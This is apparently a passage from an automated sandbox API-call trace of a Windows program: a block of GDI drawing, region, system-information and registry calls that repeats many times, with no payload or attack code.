lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.326] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.326] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.326] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.326] BeginPath (hdc=0x0) returned 0 [0091.326] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.326] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.326] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.326] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.326] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.326] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.326] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.326] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.326] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x120401d9 [0091.326] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x100401dc [0091.326] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b19 [0091.327] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b1a [0091.327] CombineRgn (hrgnDst=0x1045b19, hrgnSrc1=0x120401d9, hrgnSrc2=0x100401dc, iMode=1) returned 1 [0091.327] CombineRgn (hrgnDst=0x1045b1a, hrgnSrc1=0x120401d9, hrgnSrc2=0x100401dc, iMode=4) returned 2 [0091.327] CreateSolidBrush (color=0xff) returned 0x2105b18 [0091.327] CreateSolidBrush (color=0xff0000) returned 0x1105b1b [0091.327] DeleteObject (ho=0x1105b1b) returned 1 [0091.327] DeleteObject (ho=0x100401dc) returned 1 [0091.327] DeleteObject (ho=0x120401d9) returned 1 [0091.327] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.327] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.327] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.327] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.327] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.327] BeginPath (hdc=0x0) returned 0 [0091.327] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.327] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.327] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.327] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.327] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.327] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.327] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.327] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.327] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x110401dc [0091.327] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x130401d9 [0091.327] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b1c [0091.327] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b1d [0091.327] CombineRgn (hrgnDst=0x1045b1c, hrgnSrc1=0x110401dc, hrgnSrc2=0x130401d9, iMode=1) returned 1 [0091.327] CombineRgn (hrgnDst=0x1045b1d, hrgnSrc1=0x110401dc, hrgnSrc2=0x130401d9, iMode=4) returned 2 [0091.327] CreateSolidBrush (color=0xff) returned 0x2105b1b [0091.327] CreateSolidBrush (color=0xff0000) returned 0x1105b1e [0091.327] DeleteObject (ho=0x1105b1e) returned 1 [0091.327] DeleteObject (ho=0x130401d9) returned 1 [0091.327] DeleteObject (ho=0x110401dc) returned 1 [0091.327] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.327] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.327] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.328] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.328] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.328] BeginPath (hdc=0x0) returned 0 [0091.328] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.328] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.328] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.328] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.328] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.328] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.328] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.328] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.328] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x140401d9 [0091.328] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x120401dc [0091.328] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b1f [0091.328] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b20 [0091.328] CombineRgn (hrgnDst=0x1045b1f, hrgnSrc1=0x140401d9, hrgnSrc2=0x120401dc, iMode=1) returned 1 [0091.328] CombineRgn (hrgnDst=0x1045b20, hrgnSrc1=0x140401d9, hrgnSrc2=0x120401dc, iMode=4) returned 2 [0091.328] CreateSolidBrush (color=0xff) returned 0x2105b1e [0091.328] CreateSolidBrush (color=0xff0000) returned 0x1105b21 [0091.328] DeleteObject (ho=0x1105b21) returned 1 [0091.328] DeleteObject (ho=0x120401dc) returned 1 [0091.328] DeleteObject (ho=0x140401d9) returned 1 [0091.328] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.328] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.328] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.328] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.328] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.328] BeginPath (hdc=0x0) returned 0 [0091.328] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.328] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.328] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.328] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.328] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.328] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.328] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.328] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.329] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x130401dc [0091.329] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x150401d9 [0091.329] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b22 [0091.329] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b23 [0091.329] CombineRgn (hrgnDst=0x1045b22, hrgnSrc1=0x130401dc, hrgnSrc2=0x150401d9, iMode=1) returned 1 [0091.329] CombineRgn (hrgnDst=0x1045b23, hrgnSrc1=0x130401dc, hrgnSrc2=0x150401d9, iMode=4) returned 2 [0091.329] CreateSolidBrush (color=0xff) returned 0x2105b21 [0091.329] CreateSolidBrush (color=0xff0000) returned 0x1105b24 [0091.329] DeleteObject (ho=0x1105b24) returned 1 [0091.329] DeleteObject (ho=0x150401d9) returned 1 [0091.329] DeleteObject (ho=0x130401dc) returned 1 [0091.329] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.329] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.329] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.329] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.329] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.329] BeginPath (hdc=0x0) returned 0 [0091.329] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.329] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.329] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.329] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.329] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.329] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.329] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.329] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.329] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x160401d9 [0091.329] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x140401dc [0091.329] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b25 [0091.329] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b26 [0091.329] CombineRgn (hrgnDst=0x1045b25, hrgnSrc1=0x160401d9, hrgnSrc2=0x140401dc, iMode=1) returned 1 [0091.329] CombineRgn (hrgnDst=0x1045b26, hrgnSrc1=0x160401d9, hrgnSrc2=0x140401dc, iMode=4) returned 2 [0091.329] CreateSolidBrush (color=0xff) returned 0x2105b24 [0091.329] CreateSolidBrush (color=0xff0000) returned 0x1105b27 [0091.329] DeleteObject (ho=0x1105b27) returned 1 [0091.329] DeleteObject (ho=0x140401dc) returned 1 [0091.329] DeleteObject (ho=0x160401d9) returned 1 [0091.330] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.330] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.330] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.330] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.330] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.330] BeginPath (hdc=0x0) returned 0 [0091.330] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.330] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.330] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.330] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.330] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.330] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.330] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.330] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.330] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x150401dc [0091.330] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x170401d9 [0091.330] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b28 [0091.330] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b29 [0091.330] CombineRgn (hrgnDst=0x1045b28, hrgnSrc1=0x150401dc, hrgnSrc2=0x170401d9, iMode=1) returned 1 [0091.330] CombineRgn (hrgnDst=0x1045b29, hrgnSrc1=0x150401dc, hrgnSrc2=0x170401d9, iMode=4) returned 2 [0091.330] CreateSolidBrush (color=0xff) returned 0x2105b27 [0091.330] CreateSolidBrush (color=0xff0000) returned 0x1105b2a [0091.330] DeleteObject (ho=0x1105b2a) returned 1 [0091.330] DeleteObject (ho=0x170401d9) returned 1 [0091.330] DeleteObject (ho=0x150401dc) returned 1 [0091.330] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.330] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.330] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.330] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.330] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.330] BeginPath (hdc=0x0) returned 0 [0091.330] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.330] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.330] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.330] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.330] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.330] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.331] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.331] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.331] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x180401d9 [0091.331] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x160401dc [0091.331] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b2b [0091.331] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b2c [0091.331] CombineRgn (hrgnDst=0x1045b2b, hrgnSrc1=0x180401d9, hrgnSrc2=0x160401dc, iMode=1) returned 1 [0091.331] CombineRgn (hrgnDst=0x1045b2c, hrgnSrc1=0x180401d9, hrgnSrc2=0x160401dc, iMode=4) returned 2 [0091.331] CreateSolidBrush (color=0xff) returned 0x2105b2a [0091.331] CreateSolidBrush (color=0xff0000) returned 0x1105b2d [0091.331] DeleteObject (ho=0x1105b2d) returned 1 [0091.331] DeleteObject (ho=0x160401dc) returned 1 [0091.331] DeleteObject (ho=0x180401d9) returned 1 [0091.331] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.331] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.331] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.331] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.331] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.331] BeginPath (hdc=0x0) returned 0 [0091.331] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.331] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.331] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.331] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.331] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.331] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.331] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.331] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.331] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x170401dc [0091.331] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x190401d9 [0091.331] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b2e [0091.331] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b2f [0091.331] CombineRgn (hrgnDst=0x1045b2e, hrgnSrc1=0x170401dc, hrgnSrc2=0x190401d9, iMode=1) returned 1 [0091.332] CombineRgn (hrgnDst=0x1045b2f, hrgnSrc1=0x170401dc, hrgnSrc2=0x190401d9, iMode=4) returned 2 [0091.332] CreateSolidBrush (color=0xff) returned 0x2105b2d [0091.332] CreateSolidBrush (color=0xff0000) returned 0x1105b30 [0091.332] DeleteObject (ho=0x1105b30) returned 1 [0091.332] DeleteObject (ho=0x190401d9) returned 1 [0091.332] DeleteObject (ho=0x170401dc) returned 1 [0091.332] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.332] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.332] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.332] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.332] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.332] BeginPath (hdc=0x0) returned 0 [0091.332] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.332] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.332] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.332] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.332] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.332] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.332] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.332] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.332] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1a0401d9 [0091.332] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x180401dc [0091.332] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b31 [0091.332] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b32 [0091.332] CombineRgn (hrgnDst=0x1045b31, hrgnSrc1=0x1a0401d9, hrgnSrc2=0x180401dc, iMode=1) returned 1 [0091.332] CombineRgn (hrgnDst=0x1045b32, hrgnSrc1=0x1a0401d9, hrgnSrc2=0x180401dc, iMode=4) returned 2 [0091.332] CreateSolidBrush (color=0xff) returned 0x2105b30 [0091.332] CreateSolidBrush (color=0xff0000) returned 0x1105b33 [0091.332] DeleteObject (ho=0x1105b33) returned 1 [0091.332] DeleteObject (ho=0x180401dc) returned 1 [0091.332] DeleteObject (ho=0x1a0401d9) returned 1 [0091.332] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.332] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.332] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.332] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.332] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.332] BeginPath (hdc=0x0) returned 0 [0091.332] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.333] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.333] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.333] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.333] GetWindowRect (in: 